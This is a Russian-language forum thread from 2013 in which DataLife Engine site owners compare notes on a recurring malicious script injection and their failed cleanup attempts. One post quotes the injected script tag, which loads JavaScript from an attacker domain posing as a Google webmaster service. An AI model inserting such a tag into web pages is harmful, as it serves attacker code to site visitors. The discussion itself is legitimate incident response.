Уже начали раньше обсуждать этот вредоносный код. Предлагаю, что бы не плодить кучу тем, там и продолжать, в одном месте. Ссылка на тему
Попробовать.. Хм, что это даст? Код удалится, или дыра закрывается? :)---------- Добавлено 13.09.2013 в 08:05 ----------
Не... Вчера у меня снова webmaster-yandex появился вечерком. Тоже восстановил бэкап базы, все пароли (в очередной раз сменил), сегодня утром уже сидел webmaster-google. :)
Нет, заплатка эта точно не помогает! Ломают в другую дыру. Сегодня уже модификация появилась, вида:
<script async="async" type="text/javascript" src="http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js"></script>
Тоже, сколько не пытаюсь найти шелл в файлах двига - ничего не нахожу. :( И действительно, в шаблоне правил сайта внизу тоже эта гадость добавляется.
BrightGuy, Спасибо, конечно. Но не все там так просто. На своем опыте, вчера на одном из сайтов все так и сделали. Вычистили базу, сменили все пароли, поставили заплатку в /engine/classes/min/index.php, прогнали айболитом (ничего, кстати, не нашлось). В engine/cache/system/ никаких подобных файлов не появлялось. Сегодня снова появилась эта гадость.. Значит еще есть дыра.
П.с. Вычистил на нескольких сайтах, все процедуры аналогичные, появилась снова (пока) на одном. Сайты на ДЛЕ 9.8 и 10.
А он и есть на сервере. У меня, например, валялся в uploads/posts/2012-08/rss.js
Сеодня, смотрю, целая эпидемия внедрения webmasters-yandex.ru на ДЛЕ сайты... :) Никто не смотрел, как попали коды на сайты? Из-за дыры, ссылку на которую вначале давали?
Эта зараза после удаления, кстати, снова появляется... Заплатка с баг фикса ДЛЕ 10 уже стоит...
Может это и из-за дыры, о которой выше говорилось... А спрашивал, как все удалил? :)
Каким образом? Сегодня и у себя нашел эту заразу...
Вчера тоже скачивал, обновлял, не было ничего. Только что снова скачал-обновил - есть! :)
Ждем реализации подобного в ДЛЕ модуле. ;)
